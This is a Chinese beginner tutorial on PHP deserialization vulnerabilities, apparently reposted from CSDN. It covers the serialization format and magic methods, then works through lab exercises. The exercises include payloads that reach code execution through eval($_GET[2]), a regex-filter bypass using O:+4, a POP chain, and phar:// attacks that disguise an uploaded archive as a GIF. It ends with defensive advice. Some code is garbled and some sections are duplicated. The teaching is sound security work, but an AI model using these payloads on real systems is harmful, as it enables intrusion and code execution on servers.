我的编程空间,编程开发者的网络收藏夹
学习永远不晚

PHP反序列化入门手把手详解

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

PHP反序列化入门手把手详解

PHP反序列化入门手把手详解

前言:文章内容大致可分为原理详解-漏洞练习-
防御方法。文章内容偏向于刚接触PHP反序列化的师傅,是一篇对PHP反序列化入门的手把手教学文章。文章特色在于对PHP反序列化原理的详细分析以及一系列由简入深的PHP反序列化习题练习和分析讲解。文章写作初衷是想借助REEBUF平台与入门安全的师傅分享自己入门期间的学习成果。最后特别感谢何君师傅的教导。

问题咨询和282G网络安全资料的领取点击此处即可

序列化与反序列化

名词解释

序列化:将变量转换为可保存或传输的字符串的过程;反序列化:在适当的时候把这个字符串再转化成原来的变量使用。优点:这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。
例子1
例子:将一大段对象序列化压缩成字符串.然后根据要求反序列化重新构造对象.(②是序列化的格式,下文详解)

例子-对象压缩成字符串
1666006709348.png

例子-字符串还原成对象
1666006419469.png

例子2
再例如:网购家具,店家把家具拆分打包邮寄过来的过程就是序列化,反序列化就是买家根据说明书自定义将商品还原过程。

例子2-桌子拆分
例子2-桌子拆分.png

例子2-桌子组装还原
1666070684039.png

字符解释

字符详解
O:6:"Person":3:{s:4:"name";s:3:"tom";  s:11:"Personage";  i:18;   s:6:"*sex"; s:3:"boy";}O : 自定义对象 object6  : 类名的长度:3 : 3个成员属性S:4 : 你的成员属性名  长度为4 ,并且是一个字符串   stringS:3 : 刚刚那个成员属性对应的值 是string类型,并且长度是3位s:11:"Personage" : 因为该属性是私有属性,所以需要在属性名前加上类名,方便我们进行反序列化的时候的识别.i:18 :  18是age的属性值 , i是代表  integer类型s:6:"*sex";  sex这个属性是一个受保护的属性,特征就是 * 号s:3:"boy : 代表 string类型,属性值长度为3位  boy对应是  sex的属性值

字符解释
1666006992952.png

private和 protected详解
PHP 序列化的时候 private和 protected 变量会引入不可见字符%00,%00类名%00属性名 为private,%00*%00属性名 为protected,注意这两个 %00就是 ascii 码为0 的字符。这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得清楚.我们可以将序列化的字符用urlencode编码之后,打印出来查看.

字符解释
1666007031526.png

PHP常见魔术方法

__construct
__construct:构造函数,会在每次创建新对象时先调用此方法

__construct
1666007580220.png

__destruct
__destruct:析构函数,会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行

__destruct
1666007704969.png

__toString
__toString:返回一个类被当做字符串时要输出的内容,此方法必须返回字符串并且不能在此方法中抛出异常,否则会产生致命错误。

__tostring
1666007830582.png

__invoke
__invoke:PHP5.3起,当尝试以函数的方式调用对象时,会调用此方法。

__invoke
1666007994884.png

__call
__call : 在对象中调用一个不可访问方法时调用。

__call
1666008283124.png

__sleep
__sleep:返回一个包含对象中所有应被序列化的变量名称的数组。serialize函数在序列化类时首先会检查类中是否存在__sleep方法。如果存在,会先调用此方法然后再执行序列化操作。并且只对__sleep返回的数组中的属性进行序列化。如果__sleep不返回任何内容,则null会被序列化,并产生E_NOTICE级别的错误。__sleep不能返回父类的私有成员,否则会产生E_NOTICE级别的错误。对于一些很大但不需要保存全部数据的对象此方法很有用。即序列化serialize时会调用__sleep.

__sleep
1666008877857.png

__wakeup
__wakeup:与__sleep相反,是在unserialize函数反序列化时首先会检查类中是否存在__wakeup方法,如果存在会先调用次方法然后再执行反序列化操作。用于在反序列化之前准备一些对象需要的资源,或其他初始化操作。即反序列化unserialize时会自动调用__wakeup

__wakeup
1666009217308.png

PHP反序列化练习

一.初步认识

任务:通过传参让页面出现phpinfo界面

构建环境

习题代码
1666010195924.png

b);    }}$a = unserialize($_GET[1]);$a->action();

2,分析

payload   O:3:"one":1:{s:1:"b";s:10:"phpinfo();";}

①新建新文件用于存放预构造的代码

②实例化一个对象,将其序列化的内容打印出来

③得到其序列化的结果
习题分析

完成任务

1666010278300.png

加班->任意代码执行
习题代码

b);    }}$a = unserialize($_GET[1]);$a->action();

习题解析

新建新文件用于存放预构造的代码,重新构造代码,将其实例化一个对象,把其序列化的内容打印出来

payload O:3:"one":1:{s:1:"b";s:15:"eval($_GET[2]);";}

![习题解析]
1666010911581.png

执行命名,例如echo 123

paload O:3:"one":1:{s:1:"b";s:15:"eval($_GET[2]);";}&2=echo 123;

1666010872030.png

总结 :在考虑完过滤等先决条件后,找到可控点,构造成我们想要执行的代码,将其反序列化利用。这个过程不要去看原来代码想要执行的,关键是去构造你要执行的

二.简单利用

任务:输出phpinfo或者其他任意代码执行

构建环境

b);    }}class Student{    var $a;    function __construct()    {        $this->a = new one();    }    function __destruct()    {        $this->a->action();    }}unserialize($_GET[1]);

1666012058017.png

解析,同理

①新建新文件用于存放预构造的代码

②实例化一个对象,将其序列化的内容打印出来

③得到其序列化的结果

payload O:7:"Student":1:{s:1:"a";O:3:"one":1:{s:1:"b";s:15:"eval($_GET[2]);";}}

1666012436784.png

完成

payload O:7:"Student":1:{s:1:"a";O:3:"one":1:{s:1:"b";s:15:"eval($_GET[2]);";}}&2=phpinfo();

1666012363178.png

三.相关绕过

任务:访问当前目录的1.txt文件

构造环境:当前目录创建1.txt 输入任意内容,通过反序列化读取文件内容

1666013578861.png

[构造环境]

习题代码

file))        {            $filename = "./{$this->file}";            if (file_get_contents($filename))            {                return file_get_contents($filename);            }        }    }}if (isset($_GET['data'])){    $data = $_GET['data'];    preg_match('/[oc]:\d+:/i',$data,$matches);    if(count($matches))    {        die('Hacker!');    }    else    {        $good = unserialize($data);        echo $good;    }}else{    highlight_file("./test4.php");}?>    {        if(isset($this->file))        {            $filename = "./{$this->file}";            if (file_get_contents($filename))            {                return file_get_contents($filename);            }        }    }}if (isset($_GET['data'])){    $data = $_GET['data'];    preg_match('/[oc]:\d+:/i',$data,$matches);    if(count($matches))    {        die('Hacker!');    }    else    {        $good = unserialize($data);        echo $good;    }}else{    highlight_file("./test4.php");}?>

习题代码

解析:

观察代码,上部分定义了类,下部分是过滤的代码,过滤后可以通过传参形式以反序列构造一个对象,然后将对象用字符串打印出来,触发上半部分的__toString()魔术方法,去执行预计代码。

既然上半部分定义了类,下半部分只是过滤的代码,可以将上半部分抽离出来,查看序列化的结果,以便于反序列化

习题解析
1666013753336.png

同理,构造->序列化

习题解析
1666013841120.png

过滤:代码块中通过正则,不区分大小写的o,c字符,去匹配字符的冒号后的数字来做校验

过滤代码
1666014009275.png
5.可以通过+4等价代替 4 从而绕过检测(+ url编码为%2b)

payload  O:%2b4:"baby":1:{s:4:"file";s:5:"1.txt";}

绕过过滤

1666013969450.png

四.开始上手

任务:读取flag.GG的love

mod1->test1();    }}class B{    public $mod1;    public $mod2;    public function test1()    {        $this->mod1->test2();    }}class C{    public $mod1;    public $mod2;    public function __call($test2, $arr)    {        $s1 = $this->mod1;        $s1();    }}class D{    public $mod1;    public $mod2;    public function __invoke()    {        $this->mod2 = "字符串拼接" . $this->mod1;    }}class E{    public $str1;    public $str2;    public function __toString()    {        $this->str1->get_flag();        return "1";    }}class GetFlag{    public function get_flag()    {        echo "flag:" . "GG的love";    }}$a = $_GET['string'];unserialize($a);

解析:

涉及到对魔术方法的理解,需要回到初始部分,了解魔术方法的触发条件,建议依次由代码后头往前分析

习题解析
1666014602193.png

习题解析
1666014651360.png

习题解析
1666014675364.png

习题解析
1666014708480.png

习题解析
1666014760402.png

习题解析
1666014780681.png

解题:

代码构造: 通过 __construct()魔术方法,创建对象的时候自动调用

payloadmod1 = new  B();    }    public function __destruct()    {        $this->mod1->test1();    }}class B{    public $mod1;    public $mod2;    public function __construct()    {        $this->mod1 = new  C();    }    public function test1()    {        $this->mod1->test2();    }}class C{    public $mod1;    public $mod2;    public function __construct()    {        $this->mod1 = new  D();    }    public function __call($test2, $arr)    {        $s1 = $this->mod1;        $s1();    }}class D{    public $mod1;    public $mod2;    public function __construct()    {        $this->mod1 = new  E();    }    public function __invoke()    {        $this->mod2 = "字符串拼接" . $this->mod1;    }}class E{    public $str1;    public $str2;    public function __construct()    {        $this->str1 = new  GetFlag();    }    public function __toString()    {        $this->str1->get_flag();        return "1";    }}class GetFlag{    public function get_flag()    {        echo "flag:" . "GG的love";    }}$c = new A;echo serialize($c);payload O:1:"A":2:{s:4:"mod1";O:1:"B":2:{s:4:"mod1";O:1:"C":2:{s:4:"mod1";O:1:"D":2:{s:4:"mod1";O:1:"E":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}

实例化对象,输出序列化结果

输出序列化结果
1666055855622.png

结果

1666056041793.png
总结:从习题中不难看出, 漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞。

Phar文件和Phar协议

前言
通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserialize(),随着代码安全性越来越高,利用难度也越来越大 假如没有unserialize(),没了传参接口那该怎么利用咧,这就需要 利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展了php反序列化漏洞的攻击面。该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作 . 即通过本地构造phar文件把恶意代码本地序列化好,在将phar文件上传到目标网站,最后通过phar协议配合文件系统函数反序列化phar文件,达到预期目的.
phar文件详解
Phar文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。

phar文件分为四层

stub:phar文件的标志,必须以 xxx __HALT_COMPILER();?> 结尾,否则无法识别。xxx可以为自定义内容。//简单地说就是告诉系统自己是一个什么样的文件,声明文件后缀manifest:phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是漏洞利用最核心的地方。//存放序列化的内容content:被压缩文件的内容signature (可空):签名,放在末尾。
生成phar文件
1.准备环境

1Phar需要 PHP >= 5.2
1.2在php.ini中将phar.readonly设为Off(注意去掉前面的分号)

phpstudy配置
1666090809497.png

2.具体代码:
 output);    }}@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("GIF89a".""); //设置stub$o = new AnyClass();$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();?>

phar文件生成
1666090498354.png
①要序列化的内容,即起到的作用同上文练习题里的test.php文件一样,我们把要构造的恶意代码放进来进行序列化

②上下部分的类命一致(其它选项可以保持默认)

2.1访问phar.php文件,生成phar.phar文件

phar.phar文件生成
1666090959788.png

2.2查看phar文件内容

phar文件内容查看
1666091068301.png
总结:phar.phar文件是在我们本地生成,然后上传到目标网站,配合phar协议和相关函数,造成反序列的杀伤链.所以不用担心前置的开启phpstudy配置操作会影响后续操作.利用条件核心在于1.phar文件要能够上传到服务器端。2.要有可用的魔术方法作为“跳板”。3.文件操作函数的参数可控,且
./ …/ phar等特殊字符没有被过滤。

利用条件:
1.phar文件要能够上传到服务器端。2.要有可用的魔术方法作为“跳板”。3.文件操作函数的参数可控,且   ./    ../    phar等特殊字符没有被过滤
文件操作函数

php大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,知道创宇测试后发布的受影响的函数如下 :

文件操作函数
1666091518005.png

绕过技巧:
1.环境限制了phar不能出现在前面的字符里
compress.bzip://phar:///test.phar/test.txtcompress.bzip2://phar:///test.phar/test.txtcompress.zlib://phar:///home/sx/test.phar/test.txtphp://filter/resource=phar:///test.phar/test.txtphp://filter/read=convert.base64-encode/resource=phar://phar.phar
2.验证文件格式
$phar->setStub("GIF89a"."");
3.绕过上传后缀检查

将phar.phar更名为phar.gif 不影响phar文件的最终执行

phar.gif

练习
一.初步了解

任务:目标1.php界面任务执行phpinfo()

php代码

b);    }}//$file = '../'.$_GET['file'];is_dir('phar://phar.phar/test.txt');

php界面
1666095753278.png
解题:

分析:存在可控点以及文件操作函数,路径指向phar协议.可以直接访问1.php文件,传参执行恶意的代码

一 phar.php页面将恶意代码序列化

phar.phar文件生成
1666096005482.png
①保持类名一致

②构造恶意代码

③访问phar.php文件生成phar.phar文件

④可以查看phar.phar文件(.metadata.bin放置着序列化的恶意代码)

二.1.php页面执行phpinfo()

目标界面执行phpinfo
1666095558119.png

二.进一步了解

通过phar协议读出Destruct called

目标文件

php
1666094826497.png

分析:存在可控点以及文件操作函数file_get_contents,需要通过phar协议的反序列化功能,配合file_get_contents函数,执行phar.phar文件内序列化后的代码

同理,构造phar.phar文件,将恶意代码序列化存入phar.phar的.metadata.bin文件中

phar.phar文件生成
1666098815001.png
①保持类名一致

②访问phar.php文件

③生成phar.phar文件

访问目标文件

payload:phar://phar.phar/test.txt

完成执行
1666098582374.png

拓展:练习

具体代码

class Test{    public $num = 2;    public function __destruct()    {        if ($this->num === 1) {            echo 'flag{123}';        }    }}echo file_get_contents($_GET['data']);

(关键在于构建恶意的代码,关注点在 n u m = 2 − − − > num = 2 ---> num=2>num=1)

拓展练习
1666097212668.png

三.再进一步了解

任务:通过phar协议执行phpinfo

详细:通过upload_file.php,index.php,page.php文件模拟攻击目标,使用phar文件和phar协议执行反序列化,达到任意代码执行效果.

环境准备

www/目录(网站根目录)下放upload_file.php,index.php,page.php文件

www/目录(网站根目录)下新建upload_file文件夹

各个文件内容及解释

upload_file.php

upload_file.php:内容做了一个上传文件后缀的限制

upload_file.php
1666093061302.png
index.php 提供一个上传界面

index.php
1666093202839.png

page.php 目标可控点

 output);    }}file_exists($filename);

page.php
1666093391170.png

分析

目标存在可控点以及文件操作函数

page.php分析
1666093580339.png
2.只有upload_file.php的对上传文件的后缀限制

upload_file.php
1666094280884.png

解题

构造上传的phar文件

①通过phar.php生成的phar.phar文件,将phar.phar文件更改为phar.gif文件

phar文件生成
1666093764231.png
2.上传文件和执行

①成功上传②page页面成功执行phpinfo

page页面执行phpinfo
1666094091408.png

反序列化漏洞的防御
和大多数漏洞一样,反序列化的问题也是用户参数的控制问题引起的,所以最好的预防措施: 1.不要把用户的输入或者是用户可控的参数直接放进反序列化的操作中。2.在进入反序列化函数之前,对参数进行限制过滤,例如长度,特定参数等 3.白名单为主,限制反序列化的类,从而减小影响4.鉴权,反序列化接口进行鉴权,仅允许后台管理员等特许人员才可调用 output);    }}file_exists($filename);

page.php
[外链图片转存中…(img-RgMRJt2S-1675845598909)]

分析

目标存在可控点以及文件操作函数

page.php分析
[外链图片转存中…(img-q3aK0M9T-1675845598909)]
2.只有upload_file.php的对上传文件的后缀限制

upload_file.php
[外链图片转存中…(img-Fejl9TGv-1675845598910)]

解题

构造上传的phar文件

①通过phar.php生成的phar.phar文件,将phar.phar文件更改为phar.gif文件

phar文件生成
[外链图片转存中…(img-thINU0AB-1675845598910)]
2.上传文件和执行

①成功上传②page页面成功执行phpinfo

page页面执行phpinfo
[外链图片转存中…(img-cDXxxo7U-1675845598910)]

反序列化漏洞的防御
和大多数漏洞一样,反序列化的问题也是用户参数的控制问题引起的,所以最好的预防措施: 1.不要把用户的输入或者是用户可控的参数直接放进反序列化的操作中。2.在进入反序列化函数之前,对参数进行限制过滤,例如长度,特定参数等 3.白名单为主,限制反序列化的类,从而减小影响4.鉴权,反序列化接口进行鉴权,仅允许后台管理员等特许人员才可调用

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

点击此处即可领取282G网络安全学习资料

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

问题咨询和网络安全学习资料的领取点击此处即可

来源地址:https://blog.csdn.net/text2204/article/details/128938431

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

PHP反序列化入门手把手详解

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

PHP反序列化入门代码实例分析

本文小编为大家详细介绍“PHP反序列化入门代码实例分析”,内容详细,步骤清晰,细节处理妥当,希望这篇“PHP反序列化入门代码实例分析”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。php反序列化简单理解首先我们需要
2023-07-05

php反序列化之魔术方法超详细讲解

序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。php将数据序列化和反序列化会用到两个函数:serialize将对象格式化成有序的字符串、unserialize将字符串还原成原来的对象
2022-11-13

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录